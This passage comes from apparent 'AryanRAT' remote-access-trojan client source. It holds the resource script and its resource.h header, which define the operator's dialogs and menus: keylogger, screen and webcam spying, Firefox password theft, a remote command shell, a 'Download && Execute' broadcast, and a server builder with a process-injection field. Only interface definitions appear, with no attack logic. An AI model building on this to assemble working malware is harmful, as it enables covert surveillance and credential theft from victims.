202 | LTEXT " Local IP:",IDC_STATIC,9,97,33,9
203 | EDITTEXT IDC_IPADDRESS,9,107,137,12,ES_AUTOHSCROLL
204 | EDITTEXT IDC_SERIVCENAME,9,82,137,12,ES_AUTOHSCROLL
205 | PUSHBUTTON "Ok",IDC_OK,40,119,67,12,0,WS_EX_CLIENTEDGE
206 | END
207 |
208 | IDD_SEARCH DIALOGEX 0, 0, 343, 271
209 | STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
210 | CAPTION "Dialog"
211 | FONT 8, "MS Sans Serif", 0, 0, 0x1
212 | BEGIN
213 | CONTROL "List1",IDC_SEARCHLIST,"SysListView32",LVS_REPORT |
214 | WS_TABSTOP,0,17,343,242,WS_EX_CLIENTEDGE
215 | EDITTEXT IDC_DIR,15,2,126,12,ES_AUTOHSCROLL
216 | PUSHBUTTON "Search",IDC_SEARCH,287,1,56,13,0,WS_EX_CLIENTEDGE
217 | EDITTEXT IDC_FILENAME,175,2,110,12,ES_AUTOHSCROLL
218 | LTEXT "FileName :",IDC_STATIC,141,4,34,8
219 | LTEXT "Dir:",IDC_STATIC,1,4,13,10
220 | END
221 |
222 | IDD_SERVEREDIT DIALOG DISCARDABLE 0, 0, 343, 115
223 | STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
224 | CAPTION "Server Edit"
225 | FONT 8, "MS Sans Serif"
226 | BEGIN
227 | LTEXT "IP/DNS:",IDC_STATIC,13,18,36,12
228 | EDITTEXT IDC_IP,59,16,278,12,ES_AUTOHSCROLL
229 | GROUPBOX "Adresses",IDC_STATIC,7,7,336,26
230 | LTEXT "Main Port :",IDC_STATIC,14,44,34,8
231 | EDITTEXT IDC_FILEPORT,220,41,117,12,ES_AUTOHSCROLL
232 | PUSHBUTTON "Build",IDC_BUILD,260,95,78,12
233 | LTEXT "Exe Name :",IDC_STATIC,13,69,37,10
234 | EDITTEXT IDC_NAME,59,68,275,12,ES_AUTOHSCROLL
235 | LTEXT "File Port :",IDC_STATIC,175,44,29,8
236 | EDITTEXT IDC_MAINPORT,59,42,116,12,ES_AUTOHSCROLL
237 | GROUPBOX "Port Settings",IDC_STATIC,7,34,336,25
238 | GROUPBOX "Name",IDC_STATIC,7,61,336,22
239 | GROUPBOX "Inject",IDC_STATIC,7,84,336,24
240 | EDITTEXT IDC_PROCESS,59,95,195,13,ES_AUTOHSCROLL
241 | LTEXT "Process",IDC_STATIC,10,95,45,10
242 | END
243 |
244 | EULA DIALOGEX 0, 0, 303, 294
245 | STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
246 | CAPTION "EULA"
247 | FONT 8, "MS Sans Serif", 0, 0, 0x1
248 | BEGIN
249 | PUSHBUTTON "I agree",IDC_AGREE,165,271,66,16,0,WS_EX_CLIENTEDGE
250 | PUSHBUTTON "Don't Agree",IDC_DISAGREE,238,271,65,16,0,
251 | WS_EX_CLIENTEDGE
252 | CONTROL "",IDC_EULA,"RICHEDIT",ES_MULTILINE | ES_READONLY |
253 | WS_VSCROLL | WS_HSCROLL | WS_TABSTOP,1,1,302,265,
254 | WS_EX_CLIENTEDGE
255 | END
256 |
257 | IDD_PASSWORDS DIALOGEX 0, 0, 300, 254
258 | STYLE WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
259 | CAPTION "Dialog"
260 | FONT 8, "MS Sans Serif", 0, 0, 0x1
261 | BEGIN
262 | CONTROL "List1",IDC_PASSWORDS,"SysListView32",LVS_REPORT |
263 | WS_TABSTOP,0,0,300,236,WS_EX_CLIENTEDGE
264 | EDITTEXT IDC_ID,4,241,38,10,ES_AUTOHSCROLL
265 | END
266 |
267 | IDD_REGISTERYMAN DIALOGEX 0, 0, 396, 289
268 | STYLE WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
269 | CAPTION "Dialog"
270 | FONT 8, "MS Sans Serif", 0, 0, 0x1
271 | BEGIN
272 | CONTROL "List2",IDC_KEYLIST,"SysListView32",LVS_REPORT |
273 | WS_TABSTOP,157,0,238,289,WS_EX_CLIENTEDGE
274 | CONTROL "Tree1",IDC_REGFOLDERS,"SysTreeView32",TVS_HASBUTTONS |
275 | TVS_HASLINES | TVS_LINESATROOT | WS_TABSTOP,1,0,154,289,
276 | WS_EX_CLIENTEDGE
277 | EDITTEXT IDC_ID,117,278,38,12,ES_AUTOHSCROLL
278 | END
279 |
280 | IDD_SHELLABC DIALOGEX 0, 0, 323, 233
281 | STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
282 | CAPTION "Dialog"
283 | FONT 8, "MS Sans Serif", 0, 0, 0x1
284 | BEGIN
285 | EDITTEXT IDC_CMD,0,212,273,14,ES_AUTOHSCROLL
286 | PUSHBUTTON "Send",IDC_SENDCMD,276,212,47,14,0,WS_EX_CLIENTEDGE
287 | CONTROL "",IDC_CMD1,"RICHEDIT",ES_MULTILINE | ES_AUTOVSCROLL |
288 | ES_READONLY | WS_VSCROLL | WS_TABSTOP,0,0,323,210,
289 | WS_EX_CLIENTEDGE
290 | END
291 |
292 | IDD_INSTALLEDPROGS DIALOGEX 0, 0, 272, 234
293 | STYLE WS_POPUP | WS_CAPTION | WS_SYSMENU | WS_THICKFRAME
294 | CAPTION "Dialog"
295 | FONT 8, "MS Sans Serif", 0, 0, 0x1
296 | BEGIN
297 | CONTROL "List1",IDC_PROGS,"SysListView32",LVS_REPORT |
298 | WS_TABSTOP,0,14,272,92,WS_EX_CLIENTEDGE
299 | CONTROL "List1",IDC_SERVICES,"SysListView32",LVS_REPORT |
300 | WS_TABSTOP,0,108,272,117,WS_EX_CLIENTEDGE
301 | CONTROL "Tab2",IDC_TAB4,"SysTabControl32",0x0,0,2,272,232
302 | EDITTEXT IDC_ID,174,2,38,12,ES_AUTOHSCROLL
303 | END
304 |
305 | IDD_WEBCAM DIALOG DISCARDABLE 0, 0, 284, 203
306 | STYLE DS_MODALFRAME | WS_POPUP | WS_CAPTION | WS_SYSMENU
307 | CAPTION "Dialog"
308 | FONT 8, "MS Sans Serif"
309 | BEGIN
310 | CONTROL "Progress1",IDC_PROGRESS1,"msctls_progress32",PBS_SMOOTH,
311 | 1,194,282,8
312 | EDITTEXT IDC_ID,133,132,38,10,ES_AUTOHSCROLL
313 | END
314 |
315 |
316 | /////////////////////////////////////////////////////////////////////////////
317 | //
318 | // DESIGNINFO
319 | //
320 |
321 | #ifdef APSTUDIO_INVOKED
322 | GUIDELINES DESIGNINFO DISCARDABLE
323 | BEGIN
324 | IDD_DIALOG1, DIALOG
325 | BEGIN
326 | RIGHTMARGIN, 445
327 | VERTGUIDE, 56
328 | VERTGUIDE, 193
329 | VERTGUIDE, 231
330 | VERTGUIDE, 367
331 | BOTTOMMARGIN, 136
332 | END
333 |
334 | IDD_DIALOG3, DIALOG
335 | BEGIN
336 | VERTGUIDE, 260
337 | HORZGUIDE, 176
338 | END
339 |
340 | IDD_FILE, DIALOG
341 | BEGIN
342 | RIGHTMARGIN, 359
343 | BOTTOMMARGIN, 247
344 | HORZGUIDE, 16
345 | HORZGUIDE, 243
346 | END
347 |
348 | IDD_RENAME, DIALOG
349 | BEGIN
350 | LEFTMARGIN, 7
351 | END
352 |
353 | IDD_SETTINGS, DIALOG
354 | BEGIN
355 | RIGHTMARGIN, 147
356 | VERTGUIDE, 6
357 | VERTGUIDE, 9
358 | VERTGUIDE, 146
359 | BOTTOMMARGIN, 144
360 | END
361 |
362 | IDD_SEARCH, DIALOG
363 | BEGIN
364 | VERTGUIDE, 141
365 | VERTGUIDE, 175
366 | BOTTOMMARGIN, 259
367 | HORZGUIDE, 17
368 | HORZGUIDE, 25
369 | END
370 |
371 | IDD_SERVEREDIT, DIALOG
372 | BEGIN
373 | LEFTMARGIN, 7
374 | VERTGUIDE, 59
375 | VERTGUIDE, 337
376 | TOPMARGIN, 7
377 | BOTTOMMARGIN, 108
378 | END
379 |
380 | EULA, DIALOG
381 | BEGIN
382 | BOTTOMMARGIN, 287
383 | END
384 |
385 | IDD_REGISTERYMAN, DIALOG
386 | BEGIN
387 | RIGHTMARGIN, 340
388 | END
389 |
390 | IDD_SHELLABC, DIALOG
391 | BEGIN
392 | BOTTOMMARGIN, 226
393 | END
394 |
395 | IDD_INSTALLEDPROGS, DIALOG
396 | BEGIN
397 | TOPMARGIN, 2
398 | END
399 | END
400 | #endif // APSTUDIO_INVOKED
401 |
402 |
403 | /////////////////////////////////////////////////////////////////////////////
404 | //
405 | // Menu
406 | //
407 |
408 | IDR_MENU2 MENU DISCARDABLE
409 | BEGIN
410 | POPUP "File"
411 | BEGIN
412 | MENUITEM "&Listen", IDC_LISTEN
413 | MENUITEM "&Stop", IDC_DISCONNECT
414 | MENUITEM SEPARATOR
415 | MENUITEM "&Exit", IDCANCEL
416 | END
417 | POPUP "Edit"
418 | BEGIN
419 | MENUITEM "Connection", IDC_SETTINGS
420 | MENUITEM SEPARATOR
421 | MENUITEM "Edit Server", IDC_EDITSERVER
422 | END
423 | POPUP "Tools"
424 | BEGIN
425 | POPUP "Admin"
426 | BEGIN
427 | MENUITEM "File Manager", IDC_FILEMANAGER
428 | MENUITEM "Task manager", IDC_TASKMANAGER
429 | MENUITEM "Registry Manager", IDC_REGISTRY
430 | MENUITEM "System Manager", IDC_APPSMAN
431 | END
432 | POPUP "Spy"
433 | BEGIN
434 | MENUITEM "Screen Capture", IDC_SCREENCAPTURE
435 | MENUITEM "Keylogger", IDC_KEYLOGGER
436 | MENUITEM "WebCam", IDC_WEBCAM
437 | END
438 | POPUP "Passwords"
439 | BEGIN
440 | MENUITEM "FireFox", IDC_FIREFOX
441 | END
442 | MENUITEM SEPARATOR
443 | POPUP "Fun"
444 | BEGIN
445 | MENUITEM "Open CD", IDC_OPEN_CD
446 | MENUITEM "Close CD", IDC_CLOSE_CD
447 | MENUITEM "Disable Mouse", IDC_DISABLE_MOUSE
448 | MENUITEM "Enable Mouse", IDC_ENABLE_MOUSE
449 | END
450 | MENUITEM SEPARATOR
451 | POPUP "BroadCast"
452 | BEGIN
453 | MENUITEM "ShutDown", IDC_BROADCAST_SHUTDOWN
454 | MENUITEM "Lock Machine", IDC_BROADCAST_LOCK
455 | MENUITEM "Log Off", IDC_BROADCAST_LOGOFF
456 | MENUITEM SEPARATOR
457 | POPUP "Connection"
458 | BEGIN
459 | MENUITEM "Kill", IDC_BROADCAST_KILL
460 | END
461 | END
462 | MENUITEM SEPARATOR
463 | MENUITEM "ShutDown", IDC_SHUTDOWN
464 | MENUITEM "Lock Machine", IDC_LOCK
465 | MENUITEM "Log Off", IDC_LOGOFF
466 | MENUITEM SEPARATOR
467 | POPUP "Connection"
468 | BEGIN
469 | MENUITEM "Stop", IDC_DISCONNECT
470 | MENUITEM "Kill", IDC_KILL
471 | END
472 | END
473 | POPUP "Tools"
474 | BEGIN
475 | POPUP "Admin"
476 | BEGIN
477 | MENUITEM "File Manager", IDC_FILEMANAGER
478 | MENUITEM "Task manager", IDC_TASKMANAGER
479 | MENUITEM "Service Manager", IDC_SERVICEMANAGER
480 | MENUITEM "Registry Manager", IDC_REGISTRY
481 | MENUITEM "CMD", IDC_CMD
482 | END
483 | POPUP "Spy"
484 | BEGIN
485 | MENUITEM "Screen Capture", IDC_SCREENCAPTURE
486 | MENUITEM "Keylogger", IDC_KEYLOGGER
487 | END
488 | POPUP "Passwords"
489 | BEGIN
490 | MENUITEM "FireFox", IDC_FIREFOX
491 | END
492 | MENUITEM SEPARATOR
493 | POPUP "BroadCast"
494 | BEGIN
495 | MENUITEM "Download && Execute", IDC_DOWNLOAD_URL
496 | END
497 | MENUITEM SEPARATOR
498 | MENUITEM "ShutDown", IDC_SHUTDOWN
499 | MENUITEM "Lock Machine", IDC_LOCK
500 | MENUITEM "Log Off", IDC_LOGOFF
501 | MENUITEM SEPARATOR
502 | POPUP "Connection"
503 | BEGIN
504 | MENUITEM "Stop", IDC_DISCONNECT
505 | MENUITEM "Kill", IDC_KILL
506 | END
507 | END
508 | POPUP "Help"
509 | BEGIN
510 | MENUITEM "About", IDC_ABOUT
511 | END
512 | END
513 |
514 | IDR_MENU1 MENU DISCARDABLE
515 | BEGIN
516 | POPUP "Manage"
517 | BEGIN
518 | MENUITEM "Kill", IDC_TASK_KILL
519 | MENUITEM SEPARATOR
520 | MENUITEM "Refresh", IDC_REFRESH_TASK
521 | MENUITEM SEPARATOR
522 | END
523 | END
524 |
525 | IDR_MENU3 MENU DISCARDABLE
526 | BEGIN
527 | POPUP "File"
528 | BEGIN
529 | MENUITEM "Download", IDC_DOWNLOAD
530 | MENUITEM "Upload", IDC_UPLOAD
531 | MENUITEM SEPARATOR
532 | MENUITEM "Delete File", IDC_DELETEFILE
533 | MENUITEM "Rename", IDC_RENAME
534 | MENUITEM "Cut", IDC_MOVE
535 | MENUITEM "Copy", IDC_COPY
536 | MENUITEM "Paste", IDC_PASTE
537 | MENUITEM SEPARATOR
538 | MENUITEM "Execute", IDC_EXECUTE
539 | END
540 | MENUITEM "Edit", 65535
541 | END
542 |
543 | IDR_COMMANDS MENU DISCARDABLE
544 | BEGIN
545 | POPUP "Tools"
546 | BEGIN
547 | POPUP "Admin"
548 | BEGIN
549 | MENUITEM "File Manager", IDC_FILEMANAGER
550 | MENUITEM "Task manager", IDC_TASKMANAGER
551 | MENUITEM "Registry Manager", IDC_REGISTRY
552 | MENUITEM "System Manager", IDC_APPSMAN
553 | END
554 | POPUP "Spy"
555 | BEGIN
556 | MENUITEM "Screen Capture", IDC_SCREENCAPTURE
557 | MENUITEM "Keylogger", IDC_KEYLOGGER
558 | MENUITEM "WebCam", IDC_WEBCAM
559 | END
560 | POPUP "Passwords"
561 | BEGIN
562 | MENUITEM "FireFox", IDC_FIREFOX
563 | END
564 | MENUITEM SEPARATOR
565 | POPUP "Fun"
566 | BEGIN
567 | MENUITEM "Open CD", IDC_OPEN_CD
568 | MENUITEM "Close CD", IDC_CLOSE_CD
569 | MENUITEM "Monitor Off", IDC_MONITOR_OFF
570 | MENUITEM "Monitor On", IDC_MONITOR_ON
571 | MENUITEM "Invert Screen", IDC_INVERT_SCREEN_COLOUR
572 | END
573 | MENUITEM SEPARATOR
574 | POPUP "BroadCast"
575 | BEGIN
576 | MENUITEM "ShutDown", IDC_BROADCAST_SHUTDOWN
577 | MENUITEM "Lock Machine", IDC_BROADCAST_LOCK
578 | MENUITEM "Log Off", IDC_BROADCAST_LOGOFF
579 | MENUITEM SEPARATOR
580 | POPUP "Connection"
581 | BEGIN
582 | MENUITEM "Kill", IDC_BROADCAST_KILL
583 | END
584 | END
585 | MENUITEM SEPARATOR
586 | MENUITEM "ShutDown", IDC_SHUTDOWN
587 | MENUITEM "Lock Machine", IDC_LOCK
588 | MENUITEM "Log Off", IDC_LOGOFF
589 | MENUITEM SEPARATOR
590 | POPUP "Connection"
591 | BEGIN
592 | MENUITEM "Stop", IDC_DISCONNECT
593 | MENUITEM "Kill", IDC_KILL
594 | END
595 | END
596 | END
597 |
598 | IDR_MENU4 MENU DISCARDABLE
599 | BEGIN
600 | POPUP "File"
601 | BEGIN
602 | MENUITEM "listen", IDC_LISTEN
603 | MENUITEM SEPARATOR
604 | MENUITEM "Settings", IDC_SETTINGS
605 | MENUITEM SEPARATOR
606 | MENUITEM "Edit Server", IDC_SETTING
607 | END
608 | END
609 |
610 | IDR_DOWNLOAD MENU DISCARDABLE
611 | BEGIN
612 | POPUP "Downloads"
613 | BEGIN
614 | MENUITEM "Stop", IDC_STOP
615 | MENUITEM "Pause", IDC_PAUSE
616 | MENUITEM "Resume", IDC_RESUME
617 | MENUITEM SEPARATOR
618 | MENUITEM "Reset", IDC_RESET
619 | END
620 | END
621 |
622 | IDR_KEY MENU DISCARDABLE
623 | BEGIN
624 | POPUP "Setting"
625 | BEGIN
626 | POPUP "Colour"
627 | BEGIN
628 | MENUITEM "WindowTitle", IDC_WINDOWTEXT
629 | MENUITEM "Time && Date", IDC_TIME
630 | MENUITEM "Keys", IDC_TEXTNORMAL
631 | MENUITEM "BackGround", IDC_BACKGROUND
632 | END
633 | END
634 | END
635 |
636 | IDR_MENU5 MENU DISCARDABLE
637 | BEGIN
638 | POPUP "File"
639 | BEGIN
640 | MENUITEM "Download", IDC_DOWNLOAD
641 | MENUITEM SEPARATOR
642 | MENUITEM "Delete", IDC_DELETEFILE
643 | END
644 | END
645 |
646 | IDR_MENU6 MENU DISCARDABLE
647 | BEGIN
648 | POPUP "File"
649 | BEGIN
650 | MENUITEM "Goto Website", IDC_GOTOSITE
651 | MENUITEM "Copy Pass", IDC_COPYPW
652 | MENUITEM "Copy User", IDC_COPYUSER
653 | MENUITEM SEPARATOR
654 | MENUITEM "Refresh", IDC_REFRESH
655 | END
656 | END
657 |
658 | IDR_MENU7 MENU DISCARDABLE
659 | BEGIN
660 | POPUP "Tool"
661 | BEGIN
662 | MENUITEM "Modify", ID_TOOL_MODIFY
663 | MENUITEM SEPARATOR
664 | MENUITEM "Delete", IDC_DELETEKEY
665 | END
666 | END
667 |
668 | IDR_MENU8 MENU DISCARDABLE
669 | BEGIN
670 | POPUP "Progs"
671 | BEGIN
672 | MENUITEM "Remove", IDC_REMOVE_PROG
673 | END
674 | END
675 |
676 | IDR_MENU9 MENU DISCARDABLE
677 | BEGIN
678 | POPUP "Download's"
679 | BEGIN
680 | MENUITEM "Stop", ID_DOWNLOADS_STOP
681 | MENUITEM "Pause", ID_DOWNLOADS_PAUSE
682 | MENUITEM "Resume", ID_DOWNLOADS_RESUME
683 | END
684 | END
685 |
686 | IDR_MENU10 MENU DISCARDABLE
687 | BEGIN
688 | POPUP "Service"
689 | BEGIN
690 | MENUITEM "Stop", IDC_STOP_SERVICE
691 | MENUITEM "Start", IDC_START_SERVICE
692 | END
693 | END
694 |
695 |
696 | /////////////////////////////////////////////////////////////////////////////
697 | //
698 | // Icon
699 | //
700 |
701 | // Icon with lowest ID value placed first to ensure application icon
702 | // remains consistent on all systems.
703 | IDI_ARYAN ICON DISCARDABLE "favicon.ico"
704 | IDI_CD ICON DISCARDABLE "drive_cd.ico"
705 | IDI_FLOPPY ICON DISCARDABLE "drive_disk.ico"
706 | IDI_NETWORK ICON DISCARDABLE "drive_network.ico"
707 | IDI_VIDEO ICON DISCARDABLE "film.ico"
708 | IDI_FOLDER ICON DISCARDABLE "folder.ico"
709 | IDI_STATIC ICON DISCARDABLE "Hard Drive_ico_5.ico"
710 | IDI_COMPRESSED ICON DISCARDABLE "icon2.ico"
711 | IDI_PICTURE ICON DISCARDABLE "image.ico"
712 | IDI_MEDIA ICON DISCARDABLE "Media Clip_ico_1.ico"
713 | IDI_TEXT ICON DISCARDABLE "21_ico_1.ico"
714 | IDI_FILE ICON DISCARDABLE "Default Document_ico_3.ico"
715 | IDI_DWORD ICON DISCARDABLE "Icon_18.ico"
716 | IDI_STRING ICON DISCARDABLE "Icon_17.ico"
717 | IDI_IE ICON DISCARDABLE "Internet Explorer.ico"
718 | IDI_FIREFOX ICON DISCARDABLE "firefox-icon.ico"
719 | IDI_EXE ICON DISCARDABLE "dos.ico"
720 | IDI_SERVICE ICON DISCARDABLE "process.ico"
721 | IDI_CONNECTION ICON DISCARDABLE "display-32x32.ico"
722 | IDI_MEDIUMPING ICON DISCARDABLE "yellow.ico"
723 | IDI_HIGHPING ICON DISCARDABLE "new(1).ico"
724 | IDI_LOWPING ICON DISCARDABLE "green.ico"
725 | IDI_FILE_STOP ICON DISCARDABLE "icon1.ico"
726 | IDI_FILE_PAUSE ICON DISCARDABLE "file_pau.ico"
727 | IDI_FILE_PLAY ICON DISCARDABLE "arrow_down.ico"
728 | IDI_FILE_UP ICON DISCARDABLE "arrow_up.ico"
729 |
730 | /////////////////////////////////////////////////////////////////////////////
731 | //
732 | // BINARY
733 | //
734 |
735 | #endif // English (U.K.) resources
736 | /////////////////////////////////////////////////////////////////////////////
737 |
738 |
739 |
740 | #ifndef APSTUDIO_INVOKED
741 | /////////////////////////////////////////////////////////////////////////////
742 | //
743 | // Generated from the TEXTINCLUDE 3 resource.
744 | //
745 |
746 |
747 | /////////////////////////////////////////////////////////////////////////////
748 | #endif // not APSTUDIO_INVOKED
749 |
750 |
--------------------------------------------------------------------------------
/AryanRAT/Client/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Developer Studio generated include file.
3 | // Used by res.rc
4 | //
5 | #define IDI_ARYAN 1
6 | #define IDC_KEYS 100
7 | #define IDD_DIALOG1 101
8 | #define IDC_KEYS2 101
9 | #define IDR_MENU2 104
10 | #define IDD_DIALOG2 110
11 | #define IDD_DIALOG3 111
12 | #define IDR_MENU1 114
13 | #define IDB_TREE 132
14 | #define IDB_FILE 133
15 | #define IDR_MENU3 134
16 | #define IDD_FILE 135
17 | #define IDB_FLOPPY 139
18 | #define IDB_CD 141
19 | #define IDB_STATIC 143
20 | #define IDB_NETWORK 145
21 | #define IDB_FOLDER 149
22 | #define IDB_BACK 153
23 | #define IDR_TOOLBAR1 172
24 | #define IDR_COMMANDS 174
25 | #define IDR_MENU4 175
26 | #define IDR_MENUFolder 177
27 | #define IDB_BOOKMARK 179
28 | #define IDR_MENUBOOK 181
29 | #define IDI_BOOKMARKRED 192
30 | #define IDI_BOOKMARKBLUE 193
31 | #define IDI_BOOKMARK 194
32 | #define IDI_BOOKMARKPURPLE 195
33 | #define IDC_TASK_TAB 200
34 | #define IDI_STATIC 227
35 | #define IDI_FILE 233
36 | #define IDI_TEXT 236
37 | #define IDI_MEDIA 237
38 | #define IDI_EXE 243
39 | #define IDI_FOLDER 246
40 | #define IDI_FLOPPY 247
41 | #define IDI_CD 248
42 | #define IDI_NETWORK 249
43 | #define IDI_PICTURE 250
44 | #define IDI_VIDEO 251
45 | #define IDI_COMPRESSED 253
46 | #define IDD_RENAME 259
47 | #define IDR_DOWNLOAD 260
48 | #define IDD_KEYLOG 261
49 | #define IDD_CONNECT 262
50 | #define IDD_SCREEN 263
51 | #define IDD_SCREEN_ABD 263
52 | #define IDD_SETTINGS 264
53 | #define IDR_KEY 267
54 | #define IDD_SEARCH 270
55 | #define IDR_MENU5 271
56 | #define IDD_SERVEREDIT 272
57 | #define EULA 273
58 | #define IDD_PASSWORDS 274
59 | #define IDD_SERVICES 275
60 | #define IDR_MENU6 276
61 | #define IDD_REGISTERYMAN 277
62 | #define IDD_SHELLABC 300
63 | #define IDI_DWORD 303
64 | #define IDI_STRING 304
65 | #define IDR_MENU7 305
66 | #define IDD_INSTALLEDPROGS 306
67 | #define IDR_MENU8 307
68 | #define IDI_IE 310
69 | #define IDI_FIREFOX 314
70 | #define IDI_SERVICE 318
71 | #define IDI_CONNECTION 319
72 | #define IDI_MEDIUMPING 320
73 | #define IDI_HIGHPING 322
74 | #define IDI_LOWPING 323
75 | #define IDR_MENU9 325
76 | #define IDI_FILE_STOP 329
77 | #define IDI_FILE_PLAY 330
78 | #define IDI_FILE_PAUSE 331
79 | #define IDI_FILE_UP 333
80 | #define IDR_MENU10 334
81 | #define IDD_WEBCAM 335
82 | #define IDR_EXE 345
83 | #define IDC_FILE_STATUS 1011
84 | #define IDC_TASK_STATUS 1012
85 | #define IDC_MAIN_STATUS 1013
86 | #define IDC_SERVERLIST 1014
87 | #define IDC_LOGS 1015
88 | #define IDC_CONNECTIONSTATUS 1017
89 | #define IDC_COMMANDS 1019
90 | #define IDC_SENDCMD 1020
91 | #define IDC_SHELL_STATUS 1021
92 | #define IDC_TASKLIST 1021
93 | #define IDC_Windows 1022
94 | #define IDC_LISTDIR 1036
95 | #define IDC_TREE1 1037
96 | #define IDC_FILELIST 1038
97 | #define IDC_BOOKMARKS 1039
98 | #define IDC_FOLDERS 1041
99 | #define IDC_DOWNLOADS 1043
100 | #define IDC_TAB1 1044
101 | #define IDC_NAME 1057
102 | #define IDC_SETNAME 1058
103 | #define IDC_MAINPORT 1066
104 | #define IDC_FILEPORT 1067
105 | #define IDC_SEARCHLIST 1082
106 | #define IDC_SEARCH 1083
107 | #define IDC_DIR 1084
108 | #define IDC_FILENAME 1085
109 | #define IDC_IPADDRESS 1086
110 | #define IDC_SERIVCENAME 1087
111 | #define IDC_OK 1088
112 | #define IDC_IP 1089
113 | #define IDC_BUILD 1093
114 | #define IDC_AGREE 1095
115 | #define IDC_DISAGREE 1096
116 | #define IDC_EULA 1097
117 | #define IDC_PASSWORDS 1099
118 | #define IDC_SERVICES 1100
119 | #define IDC_KEYLIST 1102
120 | #define IDC_REGFOLDERS 1103
121 | #define IDC_LIST2 1106
122 | #define IDC_PROGRESS 1109
123 | #define IDC_SLIDER1 1110
124 | #define IDC_TAB2 1115
125 | #define IDC_PROGRESSA 1117
126 | #define IDC_CMD1 1121
127 | #define IDC_PROGS 1123
128 | #define IDC_OKSETTING 1129
129 | #define IDC_SETTINGTEXT 1131
130 | #define IDC_SETTINGTEXT1 1132
131 | #define IDC_SETTINGTEXT2 1133
132 | #define IDC_SETTINGTEXT3 1134
133 | #define IDC_KEYSCOLOUR 1135
134 | #define IDC_KEYCOLOUR 1136
135 | #define IDC_KEYSCOLOUR2 1137
136 | #define IDC_KEYCOLOUR2 1138
137 | #define IDC_KEYLOGGERCOLOURS 1140
138 | #define IDC_KEYSCOLOUR3 1141
139 | #define IDC_KEYCOLOUR3 1142
140 | #define IDC_KEYCOLOUR4 1143
141 | #define IDC_TAB3 1146
142 | #define IDC_KEYSCOLOUR4 1147
143 | #define IDC_TAB4 1148
144 | #define IDC_STATICA 1149
145 | #define IDC_STATICB 1150
146 | #define IDC_ID 1152
147 | #define IDC_PROGRESS1 1153
148 | #define IDC_PROCESS 1154
149 | #define IDC_SLEEP 1155
150 | #define IDC_SETTING_MAIN_STATUS 2000
151 | #define IDC_LISTEN 40001
152 | #define IDC_DISCONNECT 40002
153 | #define IDC_EXIT 40003
154 | #define IDC_RESET 40004
155 | #define IDC_FILEMANAGER 40005
156 | #define IDC_SHELL 40006
157 | #define IDC_TASKMANAGER 40007
158 | #define IDC_CONNECTIONOPTIONS 40008
159 | #define IDC_EDITSERVER 40009
160 | #define IDC_TASK_KILL 40011
161 | #define IDC_REFRESH_TASK 40012
162 | #define IDC_FOLDER 40013
163 | #define IDC_DELETE 40014
164 | #define IDC_DELETEFILE 40014
165 | #define IDC_BACK 40015
166 | #define IDC_FORWARD 40016
167 | #define ID_BUTTON40017 40017
168 | #define IDC_LOGOFF 40018
169 | #define IDC_SHUTDOWN 40019
170 | #define IDC_RESTART 40020
171 | #define IDC_BOOKMARK 40026
172 | #define IDC_ENTERDIR 40027
173 | #define IDC_DOWNLOAD 40028
174 | #define IDC_UPLOAD 40029
175 | #define IDC_GOTO 40030
176 | #define IDC_COPY 40033
177 | #define IDC_PASTE 40034
178 | #define IDC_MOVE 40037
179 | #define IDC_RENAME 40038
180 | #define IDC_NEW_FOLDER 40039
181 | #define IDC_RENAME_FOLDER 40040
182 | #define IDC_SCREENCAPTURE 40042
183 | #define IDC_SETTINGS 40043
184 | #define IDC_KEYLOGGER 40044
185 | #define IDC_SETTINGS2 40044
186 | #define IDC_WINDOWTEXT 40046
187 | #define IDC_TIME 40047
188 | #define IDC_TEXTNORMAL 40048
189 | #define IDC_BACKGROUND 40049
190 | #define IDC_FIND 40051
191 | #define IDC_KILL 40054
192 | #define IDC_EXECUTE 40055
193 | #define IDC_SEARCH_STATUS 40056
194 | #define IDC_FIREFOX 40056
195 | #define IDC_SERVICEMANAGER 40057
196 | #define IDC_CMD 40058
197 | #define IDC_REGISTRY 40059
198 | #define IDC_GOTOSITE 40060
199 | #define IDC_COPYPW 40061
200 | #define IDC_COPYUSER 40062
201 | #define IDC_DOWNLOAD_URL 40064
202 | #define IDC_REFRESH 40065
203 | #define IDC_BROADCAST_FILEMAN 40066
204 | #define IDC_BROADCAST_TASKMAN 40067
205 | #define IDC_BROADCAST_SERVICE 40068
206 | #define IDC_BROADCAST_REG 40069
207 | #define IDC_BROADCAST_SCREENCAPTURE 40070
208 | #define IDC_BROADCAST_KEYLOG 40071
209 | #define IDC_BROADCAST_FIREFOX 40072
210 | #define IDC_BROADCAST_CMD 40073
211 | #define IDC_BROADCAST_KILL 40075
212 | #define IDC_LOCK 40078
213 | #define IDC_BROADCAST_SHUTDOWN 40079
214 | #define IDC_BROADCAST_LOCK 40080
215 | #define IDC_BROADCAST_LOGOFF 40081
216 | #define IDC_APPSMAN 40082
217 | #define ID_TOOL_MODIFY 40083
218 | #define IDC_DELETEKEY 40084
219 | #define IDC_EXECUTE_PROG 40085
220 | #define IDC_REMOVE_PROG 40086
221 | #define IDC_ABOUT 40088
222 | #define IDC_WEBCAM 40089
223 | #define ID_DOWNLOADS_STOP 40090
224 | #define ID_DOWNLOADS_PAUSE 40091
225 | #define ID_DOWNLOADS_RESUME 40092
226 | #define IDC_STOP 40093
227 | #define IDC_PAUSE 40094
228 | #define IDC_RESUME 40095
229 | #define IDC_STOP_SERVICE 40096
230 | #define IDC_START_SERVICE 40097
231 | #define IDC_OPEN_CD 40098
232 | #define IDC_CLOSE_CD 40099
233 | #define IDC_DISABLE_MOUSE 40100
234 | #define IDC_ENABLE_MOUSE 40101
235 | #define IDC_MONITOR_OFF 40102
236 | #define IDC_MONITOR_ON 40103
237 | #define IDC_INVERT_SCREEN_COLOUR 40104
238 | #define IDC_SETTING 40105
239 |
240 | // Next default values for new objects
241 | //
242 | #ifdef APSTUDIO_INVOKED
243 | #ifndef APSTUDIO_READONLY_SYMBOLS
244 | #define _APS_NEXT_RESOURCE_VALUE 346
245 | #define _APS_NEXT_COMMAND_VALUE 40106
246 | #define _APS_NEXT_CONTROL_VALUE 1156
247 | #define _APS_NEXT_SYMED_VALUE 101
